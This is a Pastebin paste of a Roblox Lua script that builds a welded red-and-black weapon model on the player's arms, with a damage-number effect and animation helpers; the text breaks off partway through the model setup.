Alphashadowgaming

Untitled

Aug 27th, 2016
52
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 54.19 KB | None | 0 0
  1. credits='AtlasGrim'--hehehe
  2. user=game:service'Players'.localPlayer;
  3. char=user.Character
  4. mouse=user:GetMouse()
  5. m=Instance.new('Model',char)
  6. hold=false
  7.  
  8. char.Humanoid.MaxHealth=500
  9. char.Humanoid.Health=500
  10.  
  11. function DoDamage(hum,dmg)
  12. if hum.Health == 0 then return end
  13. local a,b = ypcall(function()
  14. --hum:TakeDamage(dmg)
  15. hum.Health = hum.Health - dmg
  16. if not hum.Parent:FindFirstChild("Torso") then return end
  17. local m = Instance.new("Model",workspace)
  18. m.Name = dmg
  19. local h = Instance.new("Humanoid",m)
  20. h.MaxHealth = 0
  21. local p = Instance.new("Part",m)
  22. p.Name = "Head"
  23. p.FormFactor = "Custom"
  24. p.Size = Vector3.new(1,1,1)
  25. p.Transparency = 0.97
  26. p.CanCollide = false
  27. p.Anchored = true
  28. p:BreakJoints()
  29. game.Debris:AddItem(m,5)
  30. p.CFrame = CFrame.new(hum.Parent.Torso.Position) * CFrame.new(math.random(-2,2),2.5,math.random(-2,2))
  31. local rAm = math.random(3,6)/100
  32. coroutine.wrap(function()
  33. for i=1,300 do
  34. p.CFrame = p.CFrame * CFrame.new(0,rAm,0)
  35. wait()
  36. end
  37. p:Destroy()
  38. end)()
  39. end)
  40. if not a then print(b) end
  41. end
  42.  
  43. function weld(p0,p1,c0,c1,par)
  44. local w = Instance.new("Weld",p0 or par)
  45. w.Part0 = p0
  46. w.Part1 = p1
  47. w.C0 = c0 or CFrame.new()
  48. w.C1 = c1 or CFrame.new()
  49. return w
  50. end
  51.  
  52. function lerp(a, b, t)
  53. return a + (b - a)*t
  54. end
  55.  
  56. do
  57. local function QuaternionFromCFrame(cf) local mx, my, mz, m00, m01, m02, m10, m11, m12, m20, m21, m22 = cf:components() local trace = m00 + m11 + m22 if trace > 0 then local s = math.sqrt(1 + trace) local recip = 0.5/s return (m21-m12)*recip, (m02-m20)*recip, (m10-m01)*recip, s*0.5 else local i = 0 if m11 > m00 then i = 1 end if m22 > (i == 0 and m00 or m11) then i = 2 end if i == 0 then local s = math.sqrt(m00-m11-m22+1) local recip = 0.5/s return 0.5*s, (m10+m01)*recip, (m20+m02)*recip, (m21-m12)*recip elseif i == 1 then local s = math.sqrt(m11-m22-m00+1) local recip = 0.5/s return (m01+m10)*recip, 0.5*s, (m21+m12)*recip, (m02-m20)*recip elseif i == 2 then local s = math.sqrt(m22-m00-m11+1) local recip = 0.5/s return (m02+m20)*recip, (m12+m21)*recip, 0.5*s, (m10-m01)*recip end end end
  58.  
  59. local function QuaternionToCFrame(px, py, pz, x, y, z, w) local xs, ys, zs = x + x, y + y, z + z local wx, wy, wz = w*xs, w*ys, w*zs local xx = x*xs local xy = x*ys local xz = x*zs local yy = y*ys local yz = y*zs local zz = z*zs return CFrame.new(px, py, pz,1-(yy+zz), xy - wz, xz + wy,xy + wz, 1-(xx+zz), yz - wx, xz - wy, yz + wx, 1-(xx+yy)) end
  60.  
  61. local function QuaternionSlerp(a, b, t) local cosTheta = a[1]*b[1] + a[2]*b[2] + a[3]*b[3] + a[4]*b[4] local startInterp, finishInterp; if cosTheta >= 0.0001 then if (1 - cosTheta) > 0.0001 then local theta = math.acos(cosTheta) local invSinTheta = 1/math.sin(theta) startInterp = math.sin((1-t)*theta)*invSinTheta finishInterp = math.sin(t*theta)*invSinTheta else startInterp = 1-t finishInterp = t end else if (1+cosTheta) > 0.0001 then local theta = math.acos(-cosTheta) local invSinTheta = 1/math.sin(theta) startInterp = math.sin((t-1)*theta)*invSinTheta finishInterp = math.sin(t*theta)*invSinTheta else startInterp = t-1 finishInterp = t end end return a[1]*startInterp + b[1]*finishInterp, a[2]*startInterp + b[2]*finishInterp, a[3]*startInterp + b[3]*finishInterp, a[4]*startInterp + b[4]*finishInterp end
  62.  
  63. function clerp(a,b,t)
  64. local qa = {QuaternionFromCFrame(a)}
  65. local qb = {QuaternionFromCFrame(b)}
  66. local ax, ay, az = a.x, a.y, a.z
  67. local bx, by, bz = b.x, b.y, b.z
  68.  
  69. local _t = 1-t
  70. return QuaternionToCFrame(_t*ax + t*bx, _t*ay + t*by, _t*az + t*bz,QuaternionSlerp(qa, qb, t))
  71. end
  72. end
  73. local his = {}
  74.  
  75. function ctween(tar,prop,c2,t,b)
  76. local function doIt()
  77. local now = tick()
  78. his[tar] = now
  79. local c1 = tar[prop]
  80. for i=1,t do
  81. if his[tar] ~= now then return end
  82. tar[prop] = clerp(c1,c2,1/t*i)
  83. wait(1/60)
  84. end
  85. end
  86. if b then coroutine.wrap(doIt)() else doIt() end
  87. end
  88.  
  89. local nk = char.Torso.Neck
  90. local nk0 = CFrame.new(0,1,0) * CFrame.Angles(-math.pi/2,0,math.pi)
  91. local ra,la = char["Right Arm"], char["Left Arm"]
  92. ra:BreakJoints()
  93. la:BreakJoints()
  94. local rs = weld(char.Torso,ra,CFrame.new(1.25,.5,0), CFrame.new(-.25,.5,0),stuff)
  95. local ls = weld(char.Torso,la,CFrame.new(-1.25,.5,0), CFrame.new(.25,.5,0),stuff)
  96. local rs0 = rs.C0
  97. local ls0 = ls.C0
  98.  
  99.  
  100. local Handle = Instance.new("Part", m)
  101. Handle:BreakJoints()
  102. Handle.TopSurface = "Smooth"
  103. Handle.Name = 'Handle'
  104. Handle.BottomSurface = "Smooth"
  105. Handle.FormFactor = "Custom" Handle.CanCollide = false
  106. Handle.BrickColor = BrickColor.new("Bright red")
  107. Handle.Size = Vector3.new(0.722727716, 0.789999843, 0.200000003)
  108. Handle.Transparency = 0 Handle.Reflectance = 0.30000001192093 local Handleweld = Instance.new("ManualWeld")
  109. Handleweld.Part0 = game.Players.LocalPlayer.Character["Left Arm"]
  110. Handleweld.Part1 = Handle Handleweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  111. Handleweld.C1 = CFrame.new(-0.0331363678, 0.0529589653, -0.408006668, 6.81079018e-06, 0.00025291738, -0.999999702, 3.55311636e-06, -0.999999762, -0.000252768397, -1, -3.51419908e-06, -6.73527984e-06)
  112. Handleweld.Parent = game.Players.LocalPlayer.Character["Left Arm"]
  113.  
  114. local HandleMesh = Instance.new("BlockMesh",Handle)
  115. HandleMesh.Name = "Mesh"
  116. HandleMesh.Offset = Vector3.new(0, 0, 0)
  117. HandleMesh.Scale = Vector3.new(1, 0.909090996, 0.454545468)
  118.  
  119. local Part = Instance.new("Part", m)
  120. Part:BreakJoints()
  121. Part.TopSurface = "Smooth"
  122. Part.Name = 'Part'
  123. Part.BottomSurface = "Smooth"
  124. Part.FormFactor = "Custom" Part.CanCollide = false
  125. Part.BrickColor = BrickColor.new("Bright red")
  126. Part.Size = Vector3.new(2.27272749, 0.200000003, 0.200000003)
  127. Part.Reflectance = 0.30000001192093 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  128. Partweld.Part0 = Handle Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  129. Partweld.C1 = CFrame.new(0.0313539505, -0.120179176, -1.30525064, 0.707112193, -0.707090795, 2.99402245e-06, -7.28645136e-06, -3.92117954e-06, 0.999991059, -0.707095981, -0.707107723, -8.44711576e-06)
  130. Partweld.Parent = Part
  131. local PartMesh = Instance.new("BlockMesh",Part)
  132. PartMesh.Name = "Mesh"
  133. PartMesh.Offset = Vector3.new(0, 0, 0)
  134. PartMesh.Scale = Vector3.new(1, 0.454545468, 0.909090936)
  135.  
  136. local Part = Instance.new("Part", m)
  137. Part:BreakJoints()
  138. Part.TopSurface = "Smooth"
  139. Part.Name = 'Part'
  140. Part.BottomSurface = "Smooth"
  141. Part.FormFactor = "Custom" Part.CanCollide = false
  142. Part.BrickColor = BrickColor.new("Bright red")
  143. Part.Size = Vector3.new(1.30909085, 0.200000003, 0.200000003)
  144. Part.Reflectance = 0.20000000298023 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  145. Partweld.Part0 = Handle Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  146. Partweld.C1 = CFrame.new(-0.0212306976, -0.210647583, 0.707409859, 0.707267463, 0.706945777, 8.99063525e-06, -7.35625599e-06, -5.47161471e-06, 1, 0.706945777, -0.707267761, 1.3028889e-06)
  147. Partweld.Parent = Part
  148. local PartMesh = Instance.new("BlockMesh",Part)
  149. PartMesh.Name = "Mesh"
  150. PartMesh.Offset = Vector3.new(0, 0, 0)
  151. PartMesh.Scale = Vector3.new(1, 0.454545468, 0.909090936)
  152.  
  153. local dmg4 = Instance.new("Part", m)
  154. dmg4:BreakJoints()
  155. dmg4.TopSurface = "Smooth"
  156. dmg4.Name = 'dmg4'
  157. dmg4.BottomSurface = "Smooth"
  158. dmg4.FormFactor = "Custom" dmg4.CanCollide = false
  159. dmg4.BrickColor = BrickColor.new("Really black")
  160. dmg4.Size = Vector3.new(0.545454562, 1.18181932, 0.272727281)
  161. dmg4.Reflectance = 0.60000002384186 dmg4.Transparency = 0 local dmg4weld = Instance.new("ManualWeld")
  162. dmg4weld.Part0 = Handle dmg4weld.Part1 = dmg4 dmg4weld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  163. dmg4weld.C1 = CFrame.new(0.0771980286, 1.55718255, 0.120207787, 0.999999762, -0.000210092607, 7.73429019e-06, -0.000209943508, -0.99999994, -4.11334122e-06, 7.81155177e-06, 4.14893066e-06, -1)
  164. dmg4weld.Parent = dmg4
  165. local dmg4Mesh = Instance.new("SpecialMesh",dmg4)
  166. dmg4Mesh.MeshId = "http://www.roblox.com/Asset/?id=9756362"
  167. dmg4Mesh.MeshType = Enum.MeshType.FileMesh dmg4Mesh.Name = "Mesh"
  168. dmg4Mesh.Offset = Vector3.new(0, 0, 0)
  169. dmg4Mesh.Scale = Vector3.new(-0.515454471, 0.873636365, -0.180909097)
  170.  
  171. local Part = Instance.new("Part", m)
  172. Part:BreakJoints()
  173. Part.TopSurface = "Smooth"
  174. Part.Name = 'Part'
  175. Part.BottomSurface = "Smooth"
  176. Part.FormFactor = "Custom" Part.CanCollide = false
  177. Part.BrickColor = BrickColor.new("Bright red")
  178. Part.Size = Vector3.new(2.27272725, 0.200000003, 2.27272725)
  179. Part.Reflectance = 1 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  180. Partweld.Part0 = Handle Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  181. Partweld.C1 = CFrame.new(0.031167984, -0.120185852, -0.0782046318, 0.707112491, -0.707100987, 2.91848369e-06, -7.68709378e-06, -3.5206408e-06, 1, -0.707100689, -0.707112491, -7.84470467e-06)
  182. Partweld.Parent = Part
  183. local PartMesh = Instance.new("BlockMesh",Part)
  184. PartMesh.Name = "Mesh"
  185. PartMesh.Offset = Vector3.new(0, 0, 0)
  186. PartMesh.Scale = Vector3.new(1, 0.454545468, 1)
  187.  
  188. local Part = Instance.new("Part", m)
  189. Part:BreakJoints()
  190. Part.TopSurface = "Smooth"
  191. Part.Name = 'Part'
  192. Part.BottomSurface = "Smooth"
  193. Part.FormFactor = "Custom" Part.CanCollide = false
  194. Part.BrickColor = BrickColor.new("Bright red")
  195. Part.Size = Vector3.new(0.454545468, 0.200000003, 0.454545468)
  196. Part.Reflectance = 0.20000000298023 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  197. Partweld.Part0 = Handle Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  198. Partweld.C1 = CFrame.new(0.530406475, -0.210646629, 0.613744736, -0.707312346, -0.706900775, -7.95247797e-06, -7.48035245e-06, -3.87872569e-06, 1, -0.706900775, 0.707312644, -2.5167119e-06)
  199. Partweld.Parent = Part
  200. local PartMesh = Instance.new("CylinderMesh",Part)
  201. PartMesh.Name = "Mesh"
  202. PartMesh.Offset = Vector3.new(0, 0, 0)
  203. PartMesh.Scale = Vector3.new(1, 0.454545468, 1)
  204.  
  205. local Part = Instance.new("Part", m)
  206. Part:BreakJoints()
  207. Part.TopSurface = "Smooth"
  208. Part.Name = 'Part'
  209. Part.BottomSurface = "Smooth"
  210. Part.FormFactor = "Custom" Part.CanCollide = false
  211. Part.BrickColor = BrickColor.new("Really black")
  212. Part.Size = Vector3.new(1, 0.909090936, 0.200000003)
  213. Part.Reflectance = 0.5 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  214. Partweld.Part0 = Handle Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  215. Partweld.C1 = CFrame.new(0.0777702332, -0.0460093021, 0.302001953, 0.999999642, -0.000477507012, 7.92336414e-06, -0.000477357826, -0.999999821, -3.88359558e-06, 8.00161615e-06, 3.91702588e-06, -1)
  216. Partweld.Parent = Part
  217. local PartMesh = Instance.new("SpecialMesh",Part)
  218. PartMesh.MeshId = "http://www.roblox.com/asset/?id=21057410"
  219. PartMesh.MeshType = Enum.MeshType.FileMesh PartMesh.Name = "Mesh"
  220. PartMesh.Offset = Vector3.new(0, 0, 0)
  221. PartMesh.Scale = Vector3.new(0.315454543, 0.322727233, 0.0954545364)
  222.  
  223. local dmg3 = Instance.new("Part", m)
  224. dmg3:BreakJoints()
  225. dmg3.TopSurface = "Smooth"
  226. dmg3.Name = 'dmg3'
  227. dmg3.BottomSurface = "Smooth"
  228. dmg3.FormFactor = "Custom" dmg3.CanCollide = false
  229. dmg3.BrickColor = BrickColor.new("Really black")
  230. dmg3.Size = Vector3.new(0.545454562, 1.18181932, 0.272727281)
  231. dmg3.Reflectance = 0.60000002384186 dmg3.Transparency = 0 local dmg3weld = Instance.new("ManualWeld")
  232. dmg3weld.Part0 = Handle dmg3weld.Part1 = dmg3 dmg3weld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  233. dmg3weld.C1 = CFrame.new(-0.0118477345, 1.71327496, 0.120187759, 0.000210615312, 0.99999994, 4.11333212e-06, 0.999999762, -0.00021076441, 7.82369352e-06, 7.90095874e-06, 4.14889746e-06, -1)
  234. dmg3weld.Parent = dmg3
  235. local dmg3Mesh = Instance.new("SpecialMesh",dmg3)
  236. dmg3Mesh.MeshId = "http://www.roblox.com/Asset/?id=9756362"
  237. dmg3Mesh.MeshType = Enum.MeshType.FileMesh dmg3Mesh.Name = "Mesh"
  238. dmg3Mesh.Offset = Vector3.new(0, 0, 0)
  239. dmg3Mesh.Scale = Vector3.new(-0.515454471, 0.873636365, -0.180909097)
  240.  
  241. local Part = Instance.new("Part", m)
  242. Part:BreakJoints()
  243. Part.TopSurface = "Smooth"
  244. Part.Name = 'Part'
  245. Part.BottomSurface = "Smooth"
  246. Part.FormFactor = "Custom" Part.CanCollide = false
  247. Part.BrickColor = BrickColor.new("Bright red")
  248. Part.Size = Vector3.new(0.454545468, 0.200000003, 0.454545468)
  249. Part.Reflectance = 0.20000000298023 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  250. Partweld.Part0 = Handle Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  251. Partweld.C1 = CFrame.new(-0.759212971, -0.210639954, -0.674391747, -0.707368433, -0.706844687, -7.95271262e-06, -7.48040202e-06, -3.87872615e-06, 1, -0.706844628, 0.707368731, -2.51611527e-06)
  252. Partweld.Parent = Part
  253. local PartMesh = Instance.new("CylinderMesh",Part)
  254. PartMesh.Name = "Mesh"
  255. PartMesh.Offset = Vector3.new(0, 0, 0)
  256. PartMesh.Scale = Vector3.new(1, 0.454545468, 1)
  257.  
  258. local Part = Instance.new("Part", m)
  259. Part:BreakJoints()
  260. Part.TopSurface = "Smooth"
  261. Part.Name = 'Part'
  262. Part.BottomSurface = "Smooth"
  263. Part.FormFactor = "Custom" Part.CanCollide = false
  264. Part.BrickColor = BrickColor.new("Bright red")
  265. Part.Size = Vector3.new(0.454545468, 0.200000003, 0.454545468)
  266. Part.Reflectance = 0.20000000298023 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  267. Partweld.Part0 = Handle Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  268. Partweld.C1 = CFrame.new(-0.76154232, -0.211082458, 0.633905411, -0.707312286, -0.706900835, -7.95247979e-06, -7.48035336e-06, -3.87872706e-06, 1, -0.706900835, 0.707312584, -2.51671258e-06)
  269. Partweld.Parent = Part
  270. local PartMesh = Instance.new("CylinderMesh",Part)
  271. PartMesh.Name = "Mesh"
  272. PartMesh.Offset = Vector3.new(0, 0, 0)
  273. PartMesh.Scale = Vector3.new(1, 0.454545468, 1)
  274.  
  275. local dmg1 = Instance.new("Part", m)
  276. dmg1:BreakJoints()
  277. dmg1.TopSurface = "Smooth"
  278. dmg1.Name = 'dmg1'
  279. dmg1.BottomSurface = "Smooth"
  280. dmg1.FormFactor = "Custom" dmg1.CanCollide = false
  281. dmg1.BrickColor = BrickColor.new("Really black")
  282. dmg1.Size = Vector3.new(0.545454562, 1.18181932, 0.272727281)
  283. dmg1.Reflectance = 0.60000002384186 dmg1.Transparency = 0 local dmg1weld = Instance.new("ManualWeld")
  284. dmg1weld.Part0 = Handle dmg1weld.Part1 = dmg1 dmg1weld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  285. dmg1weld.C1 = CFrame.new(0.0770072937, -1.62387848, 0.120163918, 0.999999762, -0.000210092607, 7.73429019e-06, -0.000209943508, -0.99999994, -4.11334122e-06, 7.81155177e-06, 4.14893066e-06, -1)
  286. dmg1weld.Parent = dmg1
  287. local dmg1Mesh = Instance.new("SpecialMesh",dmg1)
  288. dmg1Mesh.MeshId = "http://www.roblox.com/Asset/?id=9756362"
  289. dmg1Mesh.MeshType = Enum.MeshType.FileMesh dmg1Mesh.Name = "Mesh"
  290. dmg1Mesh.Offset = Vector3.new(0, 0, 0)
  291. dmg1Mesh.Scale = Vector3.new(-0.515454471, 0.873636365, -0.180909097)
  292.  
  293. local Part = Instance.new("Part", m)
  294. Part:BreakJoints()
  295. Part.TopSurface = "Smooth"
  296. Part.Name = 'Part'
  297. Part.BottomSurface = "Smooth"
  298. Part.FormFactor = "Custom" Part.CanCollide = false
  299. Part.BrickColor = BrickColor.new("Bright red")
  300. Part.Size = Vector3.new(0.200000003, 2.27272701, 0.200000003)
  301. Part.Reflectance = 0.30000001192093 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  302. Partweld.Part0 = Handle Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  303. Partweld.C1 = CFrame.new(-1.14925289, -0.0314512253, -0.119760513, 0.707107484, 0.707105696, -1.10258406e-06, -0.707105577, 0.707107782, -2.91853394e-06, -1.36046719e-06, 2.80614677e-06, 1)
  304. Partweld.Parent = Part
  305. local PartMesh = Instance.new("BlockMesh",Part)
  306. PartMesh.Name = "Mesh"
  307. PartMesh.Offset = Vector3.new(0, 0, 0)
  308. PartMesh.Scale = Vector3.new(0.909090996, 1, 0.454545468)
  309.  
  310. local Part = Instance.new("Part", m)
  311. Part:BreakJoints()
  312. Part.TopSurface = "Smooth"
  313. Part.Name = 'Part'
  314. Part.BottomSurface = "Smooth"
  315. Part.FormFactor = "Custom" Part.CanCollide = false
  316. Part.BrickColor = BrickColor.new("Bright red")
  317. Part.Size = Vector3.new(2.27272749, 0.200000003, 0.200000003)
  318. Part.Reflectance = 0.30000001192093 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  319. Partweld.Part0 = Handle Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  320. Partweld.C1 = CFrame.new(0.0779085159, -1.25864029, -0.120201111, 0.707106888, 0.707106173, -1.10259089e-06, -0.707106113, 0.707107246, -2.91852757e-06, -1.36046037e-06, 2.80614677e-06, 1)
  321. Partweld.Parent = Part
  322. local PartMesh = Instance.new("BlockMesh",Part)
  323. PartMesh.Name = "Mesh"
  324. PartMesh.Offset = Vector3.new(0, 0, 0)
  325. PartMesh.Scale = Vector3.new(1, 0.909090996, 0.454545468)
  326.  
  327. local Part = Instance.new("Part", m)
  328. Part:BreakJoints()
  329. Part.TopSurface = "Smooth"
  330. Part.Name = 'Part'
  331. Part.BottomSurface = "Smooth"
  332. Part.FormFactor = "Custom" Part.CanCollide = false
  333. Part.BrickColor = BrickColor.new("Bright red")
  334. Part.Size = Vector3.new(1.30000031, 0.200000003, 0.200000003)
  335. Part.Reflectance = 0.20000000298023 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  336. Partweld.Part0 = Handle Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  337. Partweld.C1 = CFrame.new(-0.0424022675, -0.211091042, -0.783349037, 0.707326114, -0.706887186, 2.96844019e-06, -7.71655777e-06, -3.48280605e-06, 1, -0.706886947, -0.707326174, -7.83788892e-06)
  338. Partweld.Parent = Part
  339. local PartMesh = Instance.new("BlockMesh",Part)
  340. PartMesh.Name = "Mesh"
  341. PartMesh.Offset = Vector3.new(0, 0, 0)
  342. PartMesh.Scale = Vector3.new(1, 0.454545468, 0.909090996)
  343.  
  344. local Part = Instance.new("Part", m)
  345. Part:BreakJoints()
  346. Part.TopSurface = "Smooth"
  347. Part.Name = 'Part'
  348. Part.BottomSurface = "Smooth"
  349. Part.FormFactor = "Custom" Part.CanCollide = false
  350. Part.BrickColor = BrickColor.new("Bright red")
  351. Part.Size = Vector3.new(2.27272749, 0.200000003, 0.200000003)
  352. Part.Reflectance = 0.30000001192093 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  353. Partweld.Part0 = Handle Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  354. Partweld.C1 = CFrame.new(0.0780677795, 0.12019062, 1.19586754, 0.707118928, 0.707094312, 1.81161104e-05, 7.81187282e-06, 1.79219624e-05, -1, -0.707094252, 0.707119226, 7.17693956e-06)
  355. Partweld.Parent = Part
  356. local PartMesh = Instance.new("BlockMesh",Part)
  357. PartMesh.Name = "Mesh"
  358. PartMesh.Offset = Vector3.new(0, 0, 0)
  359. PartMesh.Scale = Vector3.new(1, 0.454545468, 0.909090936)
  360.  
  361. local dmg2 = Instance.new("Part", m)
  362. dmg2:BreakJoints()
  363. dmg2.TopSurface = "Smooth"
  364. dmg2.Name = 'dmg2'
  365. dmg2.BottomSurface = "Smooth"
  366. dmg2.FormFactor = "Custom" dmg2.CanCollide = false
  367. dmg2.BrickColor = BrickColor.new("Really black")
  368. dmg2.Size = Vector3.new(0.545454562, 1.18181932, 0.272727281)
  369. dmg2.Reflectance = 0.60000002384186 dmg2.Transparency = 0 local dmg2weld = Instance.new("ManualWeld")
  370. dmg2weld.Part0 = Handle dmg2weld.Part1 = dmg2 dmg2weld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  371. dmg2weld.C1 = CFrame.new(-0.0120446682, -1.55901527, 0.120191574, 0.000210615312, 0.99999994, 4.11333212e-06, 0.999999762, -0.00021076441, 7.82369352e-06, 7.90095874e-06, 4.14889746e-06, -1)
  372. dmg2weld.Parent = dmg2
  373. local dmg2Mesh = Instance.new("SpecialMesh",dmg2)
  374. dmg2Mesh.MeshId = "http://www.roblox.com/Asset/?id=9756362"
  375. dmg2Mesh.MeshType = Enum.MeshType.FileMesh dmg2Mesh.Name = "Mesh"
  376. dmg2Mesh.Offset = Vector3.new(0, 0, 0)
  377. dmg2Mesh.Scale = Vector3.new(-0.515454471, 0.873636365, -0.180909097)
  378.  
  379. local Part = Instance.new("Part", m)
  380. Part:BreakJoints()
  381. Part.TopSurface = "Smooth"
  382. Part.Name = 'Part'
  383. Part.BottomSurface = "Smooth"
  384. Part.FormFactor = "Custom" Part.CanCollide = false
  385. Part.BrickColor = BrickColor.new("Bright red")
  386. Part.Size = Vector3.new(1.30000031, 0.200000003, 0.200000003)
  387. Part.Reflectance = 0.20000000298023 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  388. Partweld.Part0 = Handle Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  389. Partweld.C1 = CFrame.new(-0.111002922, -0.210646629, -0.622792721, -0.707281172, 0.706932306, -1.97609234e-06, -6.91269224e-06, -4.08157621e-06, 1, 0.706932008, 0.707281291, 7.69329836e-06)
  390. Partweld.Parent = Part
  391. local PartMesh = Instance.new("BlockMesh",Part)
  392. PartMesh.Name = "Mesh"
  393. PartMesh.Offset = Vector3.new(0, 0, 0)
  394. PartMesh.Scale = Vector3.new(1, 0.454545468, 0.909090996)
  395.  
  396. local Part = Instance.new("Part", m)
  397. Part:BreakJoints()
  398. Part.TopSurface = "Smooth"
  399. Part.Name = 'Part'
  400. Part.BottomSurface = "Smooth"
  401. Part.FormFactor = "Custom" Part.CanCollide = false
  402. Part.BrickColor = BrickColor.new("Bright red")
  403. Part.Size = Vector3.new(1.21818173, 0.200000003, 0.200000003)
  404. Part.Reflectance = 0.20000000298023 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  405. Partweld.Part0 = Handle Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  406. Partweld.C1 = CFrame.new(-0.208874702, -0.211090088, 0.659489632, -0.707189023, -0.707024276, -7.83939322e-06, -7.35447929e-06, -3.84530495e-06, 1, -0.707024217, 0.707189262, -2.45273873e-06)
  407. Partweld.Parent = Part
  408. local PartMesh = Instance.new("BlockMesh",Part)
  409. PartMesh.Name = "Mesh"
  410. PartMesh.Offset = Vector3.new(0, 0, 0)
  411. PartMesh.Scale = Vector3.new(1, 0.454545468, 0.909090936)
  412.  
  413. local Part = Instance.new("Part", m)
  414. Part:BreakJoints()
  415. Part.TopSurface = "Smooth"
  416. Part.Name = 'Part'
  417. Part.BottomSurface = "Smooth"
  418. Part.FormFactor = "Custom" Part.CanCollide = false
  419. Part.BrickColor = BrickColor.new("Bright red")
  420. Part.Size = Vector3.new(0.454545468, 0.200000003, 0.454545468)
  421. Part.Reflectance = 0.20000000298023 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  422. Partweld.Part0 = Handle Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  423. Partweld.C1 = CFrame.new(0.603512764, -0.210655212, -0.69993782, -0.707424462, -0.706788659, -7.95294545e-06, -7.48044977e-06, -3.87872569e-06, 1, -0.706788599, 0.7074247, -2.51551978e-06)
  424. Partweld.Parent = Part
  425. local PartMesh = Instance.new("CylinderMesh",Part)
  426. PartMesh.Name = "Mesh"
  427. PartMesh.Offset = Vector3.new(0, 0, 0)
  428. PartMesh.Scale = Vector3.new(1, 0.454545468, 1)
  429.  
  430.  
  431. local Handle2 = Instance.new("Part", m)
  432. Handle2:BreakJoints()
  433. Handle2.TopSurface = "Smooth"
  434. Handle2.Name = 'Handle2'
  435. Handle2.BottomSurface = "Smooth"
  436. Handle2.FormFactor = "Custom" Handle2.CanCollide = false
  437. Handle2.BrickColor = BrickColor.new("Really black")
  438. Handle2.Size = Vector3.new(0.200000003, 1.3636378, 0.272727251)
  439. Handle2.Transparency = 0 Handle2.Reflectance = 0 local Handle2weld = Instance.new("ManualWeld")
  440. Handle2weld.Part0 = game.Players.LocalPlayer.Character["Right Arm"]
  441. Handle2weld.Part1 = Handle2 Handle2weld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  442. Handle2weld.C1 = CFrame.new(0.115003586, 0.0987281799, 0.977676153, 1, 9.5066456e-24, 2.8596127e-22, -2.86119345e-22, -0.0332261063, -0.999447882, 0, 0.999447763, -0.03322611)
  443. Handle2weld.Parent = game.Players.LocalPlayer.Character["Right Arm"]
  444.  
  445. local Handle2Mesh = Instance.new("CylinderMesh",Handle2)
  446. Handle2Mesh.Name = "Mesh"
  447. Handle2Mesh.Offset = Vector3.new(0, 0, 0)
  448. Handle2Mesh.Scale = Vector3.new(0.909090996, 1, 1)
  449.  
  450. local Part = Instance.new("Part", m)
  451. Part:BreakJoints()
  452. Part.TopSurface = "Smooth"
  453. Part.Name = 'Part'
  454. Part.BottomSurface = "Smooth"
  455. Part.FormFactor = "Custom" Part.CanCollide = false
  456. Part.BrickColor = BrickColor.new("Really red")
  457. Part.Size = Vector3.new(0.200000003, 0.200000003, 0.200000003)
  458. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  459. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  460. Partweld.C1 = CFrame.new(0.000169754028, -3.45175743, -0.138971567, 0.999999821, 7.21236529e-06, 1.62003744e-11, -7.21235847e-06, 0.99999994, -1.04308128e-07, -1.65242091e-11, 0, 1)
  461. Partweld.Parent = Part
  462. local PartMesh = Instance.new("BlockMesh",Part)
  463. PartMesh.Name = "Mesh"
  464. PartMesh.Offset = Vector3.new(0, 0, 0)
